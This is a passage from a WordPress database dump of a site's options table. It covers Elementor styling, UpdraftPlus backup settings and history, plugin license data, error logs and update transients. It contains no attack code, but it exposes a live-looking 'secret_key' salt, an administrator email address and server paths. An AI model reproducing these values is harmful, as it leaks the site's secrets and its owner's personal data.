var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>\";s:7:\"version\";s:5:\"3.8.1\";}}}}','yes'),(550,'elementor_library_category_children','a:0:{}','yes'),(551,'product_cat_children','a:0:{}','yes'),(552,'category_project_children','a:0:{}','yes'),(553,'year_project_children','a:0:{}','yes'),(554,'cat_sev_children','a:0:{}','yes'),(555,'cat_team_children','a:0:{}','yes'),(561,'updraft_updraftvault','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-089b4410a9d5d9f5c4a2cee22ec37c01\";a:3:{s:5:\"token\";s:0:\"\";s:5:\"email\";s:0:\"\";s:5:\"quota\";i:-1;}}}','yes'),(562,'updraft_dropbox','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-4ccc0ba26d3dd799f0028d188889f823\";a:4:{s:6:\"appkey\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:6:\"folder\";s:0:\"\";s:15:\"tk_access_token\";s:0:\"\";}}}','yes'),(563,'updraft_s3','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-45b5128e349a5c28e4a718b493d7100a\";a:5:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:3:\"rrs\";s:0:\"\";s:22:\"server_side_encryption\";s:0:\"\";}}}','yes'),(564,'updraft_cloudfiles','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-5fc60261eda2d69f8c16cf965707e377\";a:5:{s:4:\"user\";s:0:\"\";s:7:\"authurl\";s:35:\"https://auth.api.rackspacecloud.com\";s:6:\"apikey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:6:\"region\";N;}}}','yes'),(565,'updraft_googledrive','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-0ccb78413726b83c13ef28b0bd4a5264\";a:3:{s:8:\"clientid\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:5:\"token\";s:0:\"\";}}}','yes'),(566,'updraft_onedrive','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-790ffffdb0aa7473ca06763af5844dce\";a:0:{}}}','yes'),(567,'updraft_ftp','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-fb8661677f3a5c12a9afeb7d42fd47f7\";a:5:{s:4:\"host\";s:0:\"\";s:4:\"user\";s:0:\"\";s:4:\"pass\";s:0:\"\";s:4:\"path\";s:0:\"\";s:7:\"passive\";i:1;}}}','yes'),(568,'updraft_azure','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-3707a393a1dd0182d2c470f31bc1a19e\";a:0:{}}}','yes'),(569,'updraft_sftp','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-499c76b9c9c80bbddd2eaaa2f44adc0d\";a:0:{}}}','yes'),(570,'updraft_googlecloud','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-c48177896a10a489b65303181443e101\";a:0:{}}}','yes'),(571,'updraft_backblaze','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-0828566f1bf964de1662f4c6c837098c\";a:0:{}}}','yes'),(572,'updraft_webdav','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-a168882ff4795cae8e5c4497e54b27da\";a:0:{}}}','yes'),(573,'updraft_s3generic','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-1eae336abda904e5e4e908564f18595f\";a:4:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:8:\"endpoint\";s:0:\"\";}}}','yes'),(574,'updraft_openstack','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-c1cbb4877043ec4c625dc605cfe44930\";a:6:{s:4:\"user\";s:0:\"\";s:7:\"authurl\";s:0:\"\";s:8:\"password\";s:0:\"\";s:6:\"tenant\";s:0:\"\";s:4:\"path\";s:0:\"\";s:6:\"region\";s:0:\"\";}}}','yes'),(575,'updraft_dreamobjects','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-aa7e1f6a8398d4a3b68a9211db5b27e1\";a:3:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(576,'updraftplus-addons_siteid','cea3d792960183f21b2aa6b0f87d7455','no'),(577,'updraft_lastmessage','Deleting old log file: log.5c4ed623b97b.txt (Jun 25 14:58:37)','yes'),(578,'updraftplus_unlocked_fd','1','no'),(579,'updraftplus_last_lock_time_fd','2024-05-16 06:16:54','no'),(580,'updraftplus_semaphore_fd','0','no'),(581,'updraft_last_scheduled_fd','1715840214','yes'),(583,'updraft_backup_history','a:1:{i:1715840214;a:19:{s:7:\"plugins\";a:1:{i:0;s:62:\"backup_2024-05-16-0616_Bauhaus_Living_5c4ed623b97b-plugins.zip\";}s:12:\"plugins-size\";i:29736513;s:6:\"themes\";a:1:{i:0;s:61:\"backup_2024-05-16-0616_Bauhaus_Living_5c4ed623b97b-themes.zip\";}s:11:\"themes-size\";i:25169828;s:7:\"uploads\";a:1:{i:0;s:62:\"backup_2024-05-16-0616_Bauhaus_Living_5c4ed623b97b-uploads.zip\";}s:12:\"uploads-size\";i:65202093;s:6:\"others\";a:1:{i:0;s:61:\"backup_2024-05-16-0616_Bauhaus_Living_5c4ed623b97b-others.zip\";}s:11:\"others-size\";i:260;s:2:\"db\";s:56:\"backup_2024-05-16-0616_Bauhaus_Living_5c4ed623b97b-db.gz\";s:7:\"db-size\";i:1239418;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"040d0817ffc7f2fd03e7a256aa4b05679a4aa35c\";s:7:\"themes0\";s:40:\"d41fed3b80c2561de7abe28dbdde4c680077f4f4\";s:8:\"uploads0\";s:40:\"9e6058d22ebd99048a4577a03c62e00441df72f2\";s:7:\"others0\";s:40:\"f30f51732e7c32c9272581c59161a001836f48b8\";s:3:\"db0\";s:40:\"2e7be3d14e9ea2cd0bd3e7992ee2a261a544d021\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"8bf9a3bad4a2a2ca837abcb62208b2a320e3e9ba62f3267cf14b08eac46715d1\";s:7:\"themes0\";s:64:\"3007fc5ba8aa2cb2f0ab44a384f5d059723c8666005b0e2f89fde3f2a1f44752\";s:8:\"uploads0\";s:64:\"86913a71f09ac25940bd227bda92a2e742253919467408bedbd8d6b7a412f96a\";s:7:\"others0\";s:64:\"010104d2ad3444d4f2cb74ff25d21c48f829443eb114d583f26e902a25f68cf7\";s:3:\"db0\";s:64:\"8fd6c8e1f4ad5f86fc0c0b98a83a8d8ba54393e37a3b64b2a083f702db2c7fe7\";}}s:5:\"nonce\";s:12:\"5c4ed623b97b\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1715840214;s:6:\"themes\";i:1715840224;s:7:\"uploads\";i:1715840225;s:6:\"others\";i:1715840227;}s:18:\"created_by_version\";s:6:\"1.23.3\";s:21:\"last_saved_by_version\";s:6:\"1.23.3\";s:12:\"is_multisite\";b:0;}}','no'),(584,'updraft_last_backup','a:6:{s:26:\"nonincremental_backup_time\";i:1715840214;s:11:\"backup_time\";i:1715840214;s:12:\"backup_array\";a:11:{s:7:\"plugins\";a:1:{i:0;s:62:\"backup_2024-05-16-0616_Bauhaus_Living_5c4ed623b97b-plugins.zip\";}s:12:\"plugins-size\";i:29736513;s:6:\"themes\";a:1:{i:0;s:61:\"backup_2024-05-16-0616_Bauhaus_Living_5c4ed623b97b-themes.zip\";}s:11:\"themes-size\";i:25169828;s:7:\"uploads\";a:1:{i:0;s:62:\"backup_2024-05-16-0616_Bauhaus_Living_5c4ed623b97b-uploads.zip\";}s:12:\"uploads-size\";i:65202093;s:6:\"others\";a:1:{i:0;s:61:\"backup_2024-05-16-0616_Bauhaus_Living_5c4ed623b97b-others.zip\";}s:11:\"others-size\";i:260;s:2:\"db\";s:56:\"backup_2024-05-16-0616_Bauhaus_Living_5c4ed623b97b-db.gz\";s:7:\"db-size\";i:1239418;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"040d0817ffc7f2fd03e7a256aa4b05679a4aa35c\";s:7:\"themes0\";s:40:\"d41fed3b80c2561de7abe28dbdde4c680077f4f4\";s:8:\"uploads0\";s:40:\"9e6058d22ebd99048a4577a03c62e00441df72f2\";s:7:\"others0\";s:40:\"f30f51732e7c32c9272581c59161a001836f48b8\";s:3:\"db0\";s:40:\"2e7be3d14e9ea2cd0bd3e7992ee2a261a544d021\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"8bf9a3bad4a2a2ca837abcb62208b2a320e3e9ba62f3267cf14b08eac46715d1\";s:7:\"themes0\";s:64:\"3007fc5ba8aa2cb2f0ab44a384f5d059723c8666005b0e2f89fde3f2a1f44752\";s:8:\"uploads0\";s:64:\"86913a71f09ac25940bd227bda92a2e742253919467408bedbd8d6b7a412f96a\";s:7:\"others0\";s:64:\"010104d2ad3444d4f2cb74ff25d21c48f829443eb114d583f26e902a25f68cf7\";s:3:\"db0\";s:64:\"8fd6c8e1f4ad5f86fc0c0b98a83a8d8ba54393e37a3b64b2a083f702db2c7fe7\";}}}s:7:\"success\";i:1;s:6:\"errors\";a:0:{}s:12:\"backup_nonce\";s:12:\"5c4ed623b97b\";}','yes'),(591,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(596,'revslider-update-check','1715840194','yes'),(597,'revslider_update_info','O:8:\"stdClass\":0:{}','yes'),(613,'elementor_scheme_color','a:4:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";}','yes'),(614,'elementor_scheme_typography','a:4:{i:1;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"600\";}i:2;a:2:{s:11:\"font_family\";s:11:\"Roboto Slab\";s:11:\"font_weight\";s:3:\"400\";}i:3;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"400\";}i:4;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"500\";}}','yes'),(615,'elementor_scheme_color-picker','a:8:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";i:5;s:7:\"#4054b2\";i:6;s:7:\"#23a455\";i:7;s:4:\"#000\";i:8;s:4:\"#fff\";}','yes'),(648,'duplicate_page_options','a:4:{s:21:\"duplicate_post_status\";s:5:\"draft\";s:23:\"duplicate_post_redirect\";s:7:\"to_list\";s:21:\"duplicate_post_suffix\";s:0:\"\";s:21:\"duplicate_post_editor\";s:7:\"classic\";}','yes'),(659,'category_children','a:0:{}','yes'),(699,'elementor_pro_license_key','activated','yes'),(700,'_elementor_pro_license_data','a:2:{s:7:\"timeout\";i:1719976419;s:5:\"value\";s:73:\"{\"license\":\"valid\",\"expires\":\"01.01.2030\",\"features\":{\"pro_trial\":false}}\";}','yes'),(701,'elementor_pro_version','3.8.1','yes'),(702,'widget_elementor-library','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(703,'_elementor_pro_installed_time','1668399321','yes'),(704,'elementor_submissions_db_version','5','yes'),(705,'elementor_fonts_manager_font_types','a:0:{}','yes'),(706,'elementor_fonts_manager_fonts','a:0:{}','yes'),(707,'elementor_custom_icon_sets_config','a:0:{}','yes'),(723,'WPLANG','','yes'),(724,'new_admin_email','ardy@futuremediatrix.com','yes'),(732,'revslider_update_revision_current','6.4.10','yes'),(745,'revslider-notices-dc','a:1:{i:0;s:8:\"TPRSV663\";}','yes'),(770,'elementor_pro_theme_builder_conditions','a:0:{}','yes'),(823,'_elementor_pro_api_requests_lock','a:1:{s:11:\"get_version\";i:1719284068;}','yes'),(827,'_transient_health-check-site-status-result','{\"good\":17,\"recommended\":4,\"critical\":2}','yes'),(841,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:24:\"ardy@futuremediatrix.com\";s:7:\"version\";s:5:\"6.5.5\";s:9:\"timestamp\";i:1719284070;}','no'),(844,'elementor_log','a:3:{s:32:\"1bba1900be64b6c772d5bc3527a9764c\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0file\";s:113:\"/home/fmedia/domains/bauhaus.futuremediatrix.com/public_html/wp-content/plugins/elementor-pro/license/updater.php\";s:7:\"\0*\0line\";i:84;s:7:\"\0*\0date\";s:19:\"2022-11-16 22:57:37\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:28:\"Undefined index: new_version\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:1083;s:14:\"\0*\0times_dates\";a:42:{i:0;s:19:\"2024-06-12 08:00:47\";i:1;s:19:\"2024-06-12 14:58:26\";i:2;s:19:\"2024-06-13 09:37:21\";i:3;s:19:\"2024-06-13 17:57:24\";i:4;s:19:\"2024-06-14 03:51:30\";i:5;s:19:\"2024-06-14 14:51:10\";i:6;s:19:\"2024-06-15 02:47:53\";i:7;s:19:\"2024-06-15 15:23:30\";i:8;s:19:\"2024-06-16 05:58:12\";i:9;s:19:\"2024-06-16 14:51:08\";i:10;s:19:\"2024-06-17 03:03:02\";i:11;s:19:\"2024-06-17 16:59:47\";i:12;s:19:\"2024-06-18 03:15:45\";i:13;s:19:\"2024-06-18 15:35:17\";i:14;s:19:\"2024-06-19 03:05:48\";i:15;s:19:\"2024-06-19 16:47:18\";i:16;s:19:\"2024-06-20 02:58:28\";i:17;s:19:\"2024-06-20 15:16:33\";i:18;s:19:\"2024-06-21 05:01:12\";i:19;s:19:\"2024-06-21 15:20:13\";i:20;s:19:\"2024-06-22 02:49:32\";i:21;s:19:\"2024-06-22 14:55:37\";i:22;s:19:\"2024-06-23 02:56:37\";i:23;s:19:\"2024-06-23 14:54:24\";i:24;s:19:\"2024-06-24 09:01:26\";i:25;s:19:\"2024-06-24 15:05:27\";i:26;s:19:\"2024-06-25 02:54:32\";i:27;s:19:\"2024-06-25 14:58:37\";i:28;s:19:\"2024-06-26 03:01:24\";i:29;s:19:\"2024-06-26 17:12:45\";i:30;s:19:\"2024-06-27 03:05:18\";i:31;s:19:\"2024-06-27 15:15:06\";i:32;s:19:\"2024-06-28 02:47:05\";i:33;s:19:\"2024-06-28 14:49:12\";i:34;s:19:\"2024-06-29 02:50:31\";i:35;s:19:\"2024-06-29 17:16:39\";i:36;s:19:\"2024-06-30 03:13:29\";i:37;s:19:\"2024-06-30 15:36:02\";i:38;s:19:\"2024-07-01 04:08:41\";i:39;s:19:\"2024-07-01 15:47:13\";i:40;s:19:\"2024-07-02 06:11:38\";i:41;s:19:\"2024-07-02 15:03:06\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:28:\"Undefined index: new_version\";s:4:\"file\";s:113:\"/home/fmedia/domains/bauhaus.futuremediatrix.com/public_html/wp-content/plugins/elementor-pro/license/updater.php\";s:4:\"line\";i:84;s:5:\"trace\";b:1;}}s:32:\"7dcc712729c37e2e2351e60b9f11132c\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:9:\"\0*\0column\";s:4:\"5599\";s:7:\"\0*\0file\";s:121:\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor-pro/assets/js/gallery.9c61bb9957e10e6d7bda.bundle.min.js\";s:7:\"\0*\0line\";s:1:\"2\";s:7:\"\0*\0date\";s:19:\"2023-05-30 08:52:50\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:71:\"Cannot read properties of undefined (reading \\&#039;setSettings\\&#039;)\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:4;s:14:\"\0*\0times_dates\";a:4:{i:0;s:19:\"2023-05-30 08:52:50\";i:1;s:19:\"2023-05-30 08:52:53\";i:2;s:19:\"2023-05-30 08:55:45\";i:3;s:19:\"2023-05-30 08:55:47\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1685436770\";s:7:\"message\";s:61:\"Cannot read properties of undefined (reading \\\'setSettings\\\')\";s:3:\"url\";s:121:\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor-pro/assets/js/gallery.9c61bb9957e10e6d7bda.bundle.min.js\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:4:\"5599\";}}s:32:\"2cc3fadf832176ee6086ee0cb2692535\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0file\";s:125:\"/home/fmedia/domains/bauhaus.futuremediatrix.com/public_html/wp-content/plugins/elementor/core/common/modules/ajax/module.php\";s:7:\"\0*\0line\";i:171;s:7:\"\0*\0date\";s:19:\"2023-09-22 09:19:40\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:21:\"Undefined index: data\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2023-09-22 09:19:40\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:21:\"Undefined index: data\";s:4:\"file\";s:125:\"/home/fmedia/domains/bauhaus.futuremediatrix.com/public_html/wp-content/plugins/elementor/core/common/modules/ajax/module.php\";s:4:\"line\";i:171;s:5:\"trace\";b:1;}}}','no'),(4322,'wpcode_notifications','a:4:{s:6:\"update\";i:1712965560;s:4:\"feed\";a:1:{i:0;a:8:{s:5:\"title\";s:86:\"Introducing the ability to load JavaScript and CSS snippets as files in WPCode v2.1.11\";s:7:\"content\";s:298:\"You can now generate a separate file for each JavaScript/CSS snippet you create. This feature helps you boost site performance, simplifies dependency management, and enhances localization flexibility! For example, you can reference snippet files as dependencies for other scripts and do much more! \";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:5:\"elite\";i:2;s:4:\"lite\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:2:\"id\";i:56;s:4:\"icon\";s:7:\"success\";s:4:\"btns\";a:1:{s:4:\"main\";a:2:{s:3:\"url\";s:112:\"https://wpcode.com/introducing-wpcode-2111/?utm_source=plugin&utm_medium=notification&utm_campaign=snippet-files\";s:4:\"text\";s:10:\"Learn More\";}}s:5:\"start\";s:19:\"2024-04-09 04:00:00\";s:3:\"end\";s:19:\"2024-04-16 04:00:00\";}}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','no'),(6103,'db_upgraded','','yes'),(7243,'secret_key','i&o0]:=v*(k6U+DUHQGH yllkCb}pD?hi6?(`JomT2 3K*PIqaVPUQ:M05x*t&Rb','no'),(8295,'wp_attachment_pages_enabled','1','yes'),(11534,'auto_update_plugins','a:1:{i:0;s:35:\"insert-headers-and-footers/ihaf.php\";}','no'),(11545,'wpcode_usage_tracking_config','a:6:{s:3:\"day\";i:6;s:4:\"hour\";i:20;s:6:\"minute\";i:47;s:6:\"second\";i:33;s:6:\"offset\";i:593253;s:8:\"initsend\";i:1711831653;}','no'),(11559,'wpcode_admin_notices','a:1:{s:14:\"review_request\";a:2:{s:4:\"time\";i:1710769919;s:9:\"dismissed\";b:0;}}','yes'),(12765,'_site_transient_wp_plugin_dependencies_plugin_data','a:0:{}','no'),(13092,'wpcode_snippets_errors','a:1:{i:0;i:4996;}','yes'),(13541,'_transient_exp','a:3:{s:13:\"199.45.155.45\";i:1714475279;s:14:\"139.180.155.77\";i:1714475280;s:13:\"199.45.154.61\";i:1714488907;}','yes'),(13902,'can_compress_scripts','1','yes'),(13907,'updraft_pcloud','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-be5daeca823267387f30fa9181baa8f2\";a:0:{}}}','yes'),(13928,'_transient_is_multi_author','1','yes'),(14873,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.5.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.5.5.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.5.5-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.5.5-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.5.5\";s:7:\"version\";s:5:\"6.5.5\";s:11:\"php_version\";s:5:\"7.0.0\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.4\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1719932580;s:15:\"version_checked\";s:5:\"6.5.5\";s:12:\"translations\";a:0:{}}','no'),(14875,'elementor_pro_remote_info_api_data_3.8.1','a:2:{s:7:\"timeout\";i:1719327268;s:5:\"value\";s:42:\"{\"license\":\"valid\",\"expires\":\"01.01.2030\"}\";}','no'),(15090,'_site_transient_timeout_php_check_990bfacb848fa087bcfc06850f5e4447','1720505483','no'),(15091,'_site_transient_php_check_990bfacb848fa087bcfc06850f5e4447','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:3:\"7.0\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(15096,'_transient_timeout_mc4wp_mailchimp_lists','1720002160','no'),(15097,'_transient_mc4wp_mailchimp_lists','a:0:{}','no'),(15101,'_site_transient_timeout_theme_roots','1719934381','no'),(15102,'_site_transient_theme_roots','a:6:{s:13:\"retirio-child\";s:7:\"/themes\";s:7:\"retirio\";s:7:\"/themes\";s:16:\"twentytwentyfour\";s:7:\"/themes\";s:15:\"twentytwentyone\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','no'),(15103,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1719932583;s:7:\"checked\";a:6:{s:13:\"retirio-child\";s:5:\"1.0.0\";s:7:\"retirio\";s:5:\"1.0.4\";s:16:\"twentytwentyfour\";s:3:\"1.0\";s:15:\"twentytwentyone\";s:3:\"1.7\";s:17:\"twentytwentythree\";s:3:\"1.0\";s:15:\"twentytwentytwo\";s:3:\"1.3\";}s:8:\"response\";a:4:{s:16:\"twentytwentyfour\";a:6:{s:5:\"theme\";s:16:\"twentytwentyfour\";s:11:\"new_version\";s:3:\"1.1\";s:3:\"url\";s:46:\"https://wordpress.org/themes/twentytwentyfour/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/